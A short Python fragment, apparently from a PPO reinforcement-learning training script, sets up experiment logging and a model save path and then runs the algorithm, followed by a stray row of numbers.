logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
# Save model path
fpath = osp.join(logger_kwargs['output_dir'], 'models')
ppo = PPO()
ppo.run()
| 8,048 | -11 | 197 |